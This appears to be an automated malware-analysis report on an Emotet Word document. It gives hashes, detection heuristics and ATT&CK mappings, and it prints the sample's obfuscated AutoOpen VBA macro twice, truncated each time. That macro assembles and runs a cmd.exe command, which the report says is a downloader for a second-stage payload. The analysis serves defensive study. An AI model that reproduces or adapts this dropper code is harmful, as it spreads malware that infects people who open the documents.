Emotet Office (OLE) malware analysis — malicious · d484083ae9cd61eb

MALICIOUS

Office (OLE)

90.4 KB Created: 2018-08-08 09:10:00 Authoring application: Microsoft Office Word First seen: 2018-08-14

MD5: 751ea8741443cb59017a841f81e7c2c4 SHA-1: 7842384d87dcb08e077846310b7a7b1998d80328 SHA-256: d484083ae9cd61eb460c9dce2e09a805c15760e6b7f0f96f0863df24aef86b32

142 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with a specific Emotet signature. The presence of an AutoOpen VBA macro, detected by multiple heuristics, indicates that malicious code executes automatically upon opening the document. The script attempts to construct and execute a command using 'cmd.exe', strongly suggesting it's a downloader for a second-stage payload, consistent with Emotet's behavior.

Heuristics 5

ClamAV: Doc.Downloader.Emotet-6884087-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6884087-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5543 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5543 bytes
SHA-256: `2c0faaa048a4ce74ca496bccffda47b8e0b9781d358197f2f68fec5094342cbd`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "OAcOimGY" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next TypeName IJKlr TypeName ChrB(91407 * YUAzd) TypeName Rnd(951) TypeName CBool(448) TypeName CByte(UzDJZ * NbPEqq / VUscN * cLzijE) Shell@ CStr("c") + CStr("m") + iKBYEpDAHXPYn + bBmmPTfz + vjGFicd + sIakCAjjip + PFIIKYqVaq + YlARTDfUf + CLJaGjiADN + aVwWLvbtzmX, 195825326 - 195825326 TypeName GtYEu TypeName VtWQT End Sub Attribute VB_Name = "bmTpOWNCpBMY" Function vjGFicd() On Error Resume Next TypeName 5 TypeName Sgn(4343) YlzrZFHfjBN = "d /V" + ":/C" + CStr(Chr(hXPcEmLufWZRu + zzwizYvVXr + 34 + kWRAIcPGjnGE + VdvibTvFiN)) + "set " + "9z=" + "aCqqdbdjG" + "wKtItVaQ" + "AduXUCj" + "PU" TypeName Sgn(KSWaM) TypeName ChrW(484889579) TypeName vjJCz dlwjtA = "uGZzwhop'" + "y{N.(\" + "m" + "fTWl;n,D9" + "xY" + "c" + "sS=k3OF1" + "}v" + ":e-/)i r" + "6$@+&&fo" + "r %0 in" TypeName TljBAv TypeName iiJPNT TypeName Sin(4) zlpDf = " (33,32,3" + "0" + ",65,71,54," + "31,65,45" + ",45" + ",7" TypeName CLng(9294) TypeName CDbl(29666 + OFXOQ / VHDwO + 72209) ACNhwzLao = "0,73,31,4" + "9," + "18,56,4" + "7,65,30," + "66,3" + "2," + "5," + "23,65,5" + "3,13" TypeName fjzAJ TypeName UqjChP UitzvFqihUS = "," + "70,37,65," + "13,3" + "8,44" + ",65,5,22,4" + "5,69,65,4" + "7," + "1" TypeName WaLvMU TypeName CStr(93563 + qzbQNB - 88060 - QkPih) TypeName 843 zGkCbEzTMk = "3,46,73" + ",15,43,55," + "56,3" + "4,3" + "1,13,13,3" + "3,6" + "4,67,67," + "54,53" + ",15," + "47" + ",18,71,3" TypeName ChrB(20) TypeName ijKUzj mmIFdOifP = "5" + ",6" + "5" + ",71,38," + "54,65" + "," + "67,52,74,3" + "1,13,1" + "3" + ",33," + "64,67" + ",67," + "45,65,69," vjGFicd = YlzrZFHfjBN + dlwjtA + zlpDf + ACNhwzLao + UitzvFqihUS + zGkCbEzTMk + mmIFdOifP TypeName 233321069 TypeName ChrB(12643571) TypeName TTCEci End Function Function sIakCAjjip() On Error Resume Next TypeName CSng(101) TypeName Log(DjGqS) TypeName Atn(zCWPn) murwBVJBSa = "54," + "26,71,65" + "," + "53,32,69," + "47,41,15" + ",53," + "31,69,47," + "65,38,53" + ",32,41," + "6" + "7,2" + "0,51,59," + "74,31,13," TypeName CLng(IkGzt) TypeName 347 PoUJFkOs = "13,33,64," + "67,67,54,1" + "5,47,13,15" + ",53,31,15" + ",71," TypeName CSng(6) TypeName CInt(TWjQE) wSjARnR = "6" + "9" + ",13,3" + "5,65,6" + "3,6" + "5,47,13,38" + ",53" + ",32,41,67," + "16," + "10,57,16,7" + "4,3" + "1," TypeName Int(bWvnj * 38159) TypeName CStr(jUMFW) TypeName Int(83155 * 72171 - 57060 / 76265) SjXkiui = "13,13,3" + "3,6" + "4,67,67" + ",47,15" + "," + "54" + ",65" + ",66,71,32" + ",18,69," + "4" + "7,1" TypeName Cos(DUzAl * ohiQrz * 77073 / UYlGhh) TypeName mfOqdk TypeName ChrB(DwPwT) fKbRvJfHOqz = "5,38,53,29" + ",67," + "51" + ",32,14,50" + ",44,72,74" + ",31,13," + "13," + "3" + "3,64,67" + ",6" + "7" + ",54,6" TypeName XrarjO TypeName qJuZZ BioJjfJQ = "5,7" + "1,5," + "32,71,6" + "5,57,3" + "8" + ",53,32," + "41,67,5,5" + "8" + ",65,32,44," + "3,34,3" + "8,55,3" + "3,45" TypeName 70 TypeName 5 FzZbqjBDCom = ",69,13,39," + "34" + ",74," + "34,68,46," + "73,49,26," + "60,70,5" sIakCAjjip = murwBVJBSa + PoUJFkOs + wSjARnR + SjXkiui + fKbRvJfHOqz + BioJjfJQ + FzZbqjBDCom TypeName Tan(64338 - 53859 + 51956 + JLqFXC) TypeName CBool(988) TypeName 153062119 End Function Function PFIIKYqVaq() On Error Resume Next TypeName tAYwtF TypeName GrrMO TypeName CInt(19) YHKqO = "6,70,34,61" + ",61,61," + "34,46,73,2" + "8,25,60,5" + "6,73,6" + "5," + "47" + ",6" + "3,64," + "13," TypeName CLng(313410910) TypeName Round(JSNnY * iIQOR) pLFfXKw = "6" + "5,41,33,75" + ",34,40" + ",34,75,73," + "49,26,6" + "0,75,34,3" + "8,65" + ",5" + "1,65," + "34,46," + "42," + "32," + "71,65,15" TypeName Arrob TypeName ChrB(SEAPX) PsZDbWwsU = ",53, ... (truncated)

SHA-256: 2c0faaa048a4ce74ca496bccffda47b8e0b9781d358197f2f68fec5094342cbd

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "OAcOimGY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TypeName IJKlr
   TypeName ChrB(91407 * YUAzd)
   TypeName Rnd(951)
   TypeName CBool(448)
   TypeName CByte(UzDJZ * NbPEqq / VUscN * cLzijE)
Shell@ CStr("c") + CStr("m") + iKBYEpDAHXPYn + bBmmPTfz + vjGFicd + sIakCAjjip + PFIIKYqVaq + YlARTDfUf + CLJaGjiADN + aVwWLvbtzmX, 195825326 - 195825326
   TypeName GtYEu
   TypeName VtWQT
End Sub


Attribute VB_Name = "bmTpOWNCpBMY"
Function vjGFicd()
On Error Resume Next
TypeName 5
   TypeName Sgn(4343)
YlzrZFHfjBN = "d /V" + ":/C" + CStr(Chr(hXPcEmLufWZRu + zzwizYvVXr + 34 + kWRAIcPGjnGE + VdvibTvFiN)) + "set " + "9z=" + "aCqqdbdjG" + "wKtItVaQ" + "AduXUCj" + "PU"
TypeName Sgn(KSWaM)
   TypeName ChrW(484889579)
   TypeName vjJCz
dlwjtA = "uGZzwhop'" + "y{N.(\" + "m" + "fTWl;n,D9" + "xY" + "c" + "sS=k3OF1" + "}v" + ":e-/)i r" + "6$@+&&fo" + "r %0 in"
TypeName TljBAv
   TypeName iiJPNT
   TypeName Sin(4)
zlpDf = " (33,32,3" + "0" + ",65,71,54," + "31,65,45" + ",45" + ",7"
TypeName CLng(9294)
   TypeName CDbl(29666 + OFXOQ / VHDwO + 72209)
ACNhwzLao = "0,73,31,4" + "9," + "18,56,4" + "7,65,30," + "66,3" + "2," + "5," + "23,65,5" + "3,13"
TypeName fjzAJ
   TypeName UqjChP
UitzvFqihUS = "," + "70,37,65," + "13,3" + "8,44" + ",65,5,22,4" + "5,69,65,4" + "7," + "1"
TypeName WaLvMU
   TypeName CStr(93563 + qzbQNB - 88060 - QkPih)
   TypeName 843
zGkCbEzTMk = "3,46,73" + ",15,43,55," + "56,3" + "4,3" + "1,13,13,3" + "3,6" + "4,67,67," + "54,53" + ",15," + "47" + ",18,71,3"
TypeName ChrB(20)
   TypeName ijKUzj
mmIFdOifP = "5" + ",6" + "5" + ",71,38," + "54,65" + "," + "67,52,74,3" + "1,13,1" + "3" + ",33," + "64,67" + ",67," + "45,65,69,"
vjGFicd = YlzrZFHfjBN + dlwjtA + zlpDf + ACNhwzLao + UitzvFqihUS + zGkCbEzTMk + mmIFdOifP
   TypeName 233321069
   TypeName ChrB(12643571)
   TypeName TTCEci
End Function
Function sIakCAjjip()
On Error Resume Next
TypeName CSng(101)
   TypeName Log(DjGqS)
   TypeName Atn(zCWPn)
murwBVJBSa = "54," + "26,71,65" + "," + "53,32,69," + "47,41,15" + ",53," + "31,69,47," + "65,38,53" + ",32,41," + "6" + "7,2" + "0,51,59," + "74,31,13,"
TypeName CLng(IkGzt)
   TypeName 347
PoUJFkOs = "13,33,64," + "67,67,54,1" + "5,47,13,15" + ",53,31,15" + ",71,"
TypeName CSng(6)
   TypeName CInt(TWjQE)
wSjARnR = "6" + "9" + ",13,3" + "5,65,6" + "3,6" + "5,47,13,38" + ",53" + ",32,41,67," + "16," + "10,57,16,7" + "4,3" + "1,"
TypeName Int(bWvnj * 38159)
   TypeName CStr(jUMFW)
   TypeName Int(83155 * 72171 - 57060 / 76265)
SjXkiui = "13,13,3" + "3,6" + "4,67,67" + ",47,15" + "," + "54" + ",65" + ",66,71,32" + ",18,69," + "4" + "7,1"
TypeName Cos(DUzAl * ohiQrz * 77073 / UYlGhh)
   TypeName mfOqdk
   TypeName ChrB(DwPwT)
fKbRvJfHOqz = "5,38,53,29" + ",67," + "51" + ",32,14,50" + ",44,72,74" + ",31,13," + "13," + "3" + "3,64,67" + ",6" + "7" + ",54,6"
TypeName XrarjO
   TypeName qJuZZ
BioJjfJQ = "5,7" + "1,5," + "32,71,6" + "5,57,3" + "8" + ",53,32," + "41,67,5,5" + "8" + ",65,32,44," + "3,34,3" + "8,55,3" + "3,45"
TypeName 70
   TypeName 5
FzZbqjBDCom = ",69,13,39," + "34" + ",74," + "34,68,46," + "73,49,26," + "60,70,5"
sIakCAjjip = murwBVJBSa + PoUJFkOs + wSjARnR + SjXkiui + fKbRvJfHOqz + BioJjfJQ + FzZbqjBDCom
   TypeName Tan(64338 - 53859 + 51956 + JLqFXC)
   TypeName CBool(988)
   TypeName 153062119
End Function
Function PFIIKYqVaq()
On Error Resume Next
TypeName tAYwtF
   TypeName GrrMO
   TypeName CInt(19)
YHKqO = "6,70,34,61" + ",61,61," + "34,46,73,2" + "8,25,60,5" + "6,73,6" + "5," + "47" + ",6" + "3,64," + "13,"
TypeName CLng(313410910)
   TypeName Round(JSNnY * iIQOR)
pLFfXKw = "6" + "5,41,33,75" + ",34,40" + ",34,75,73," + "49,26,6" + "0,75,34,3" + "8,65" + ",5" + "1,65," + "34,46," + "42," + "32," + "71,65,15"
TypeName Arrob
   TypeName ChrB(SEAPX)
PsZDbWwsU = ",53,
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.